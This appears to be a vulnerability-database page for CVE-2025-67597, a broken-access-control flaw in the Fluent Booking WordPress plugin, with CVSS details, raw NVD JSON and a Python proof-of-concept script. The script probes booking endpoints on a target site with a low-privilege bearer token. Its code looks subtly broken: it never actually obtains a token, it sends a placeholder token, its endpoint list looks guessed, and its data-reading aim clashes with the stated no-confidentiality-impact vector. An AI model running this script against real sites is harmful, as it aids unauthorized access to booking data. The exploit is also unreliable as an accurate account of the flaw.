Security Vulnerability Report
中文
CVE-2025-67597 CVSS 4.3 MEDIUM

CVE-2025-67597

Published: 2025-12-09 16:18:38
Last Modified: 2026-04-27 18:16:46

Description

Missing Authorization vulnerability in Shahjahan Jewel Fluent Booking fluent-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fluent Booking: from n/a through <= 1.9.11.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Fluent Booking插件 <= 1.9.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67597 PoC - Fluent Booking Broken Access Control # Target: WordPress site with Fluent Booking plugin <= 1.9.11 target_url = "http://target-site.com" # PoC for unauthorized access to booking data # This demonstrates accessing booking information without proper authorization def exploit_unauthorized_access(target): """ Exploit missing authorization in Fluent Booking plugin Attack Vector: Network (AV:N) Privileges Required: Low (PR:L) - any authenticated user User Interaction: None (UI:N) """ # Step 1: Identify WordPress installation and Fluent Booking plugin wp_api = f"{target}/wp-json/wp/v2/users" # Step 2: Get authentication token with low-privilege account auth_endpoint = f"{target}/wp-json/jwt-auth/v1/token" auth_data = { "username": "attacker_account", "password": "attacker_password" } # Step 3: Access protected booking data without proper authorization # The plugin fails to verify if user has permission to view booking details booking_endpoints = [ f"{target}/wp-json/fluent-booking/v1/bookings", f"{target}/wp-admin/admin-ajax.php?action=fluent_booking_get_bookings", f"{target}/wp-json/fluent-booking/v1/calendar-events" ] print("[*] Testing Fluent Booking Authorization Bypass...") for endpoint in booking_endpoints: # Send request with low-privilege token response = requests.get(endpoint, headers={ "Authorization": "Bearer <low_privilege_token>", "Content-Type": "application/json" }) if response.status_code == 200: print(f"[!] Authorization bypassed at: {endpoint}") print(f"[!] Response: {response.text[:500]}") return True if __name__ == "__main__": if len(sys.argv) > 1: exploit_unauthorized_access(sys.argv[1]) else: print("Usage: python cve-2025-67597_poc.py <target_url>")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67597", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:38.030", "lastModified": "2026-04-27T18:16:46.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Shahjahan Jewel Fluent Booking fluent-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fluent Booking: from n/a through <= 1.9.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/fluent-booking/vulnerability/wordpress-fluent-booking-plugin-1-9-11-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}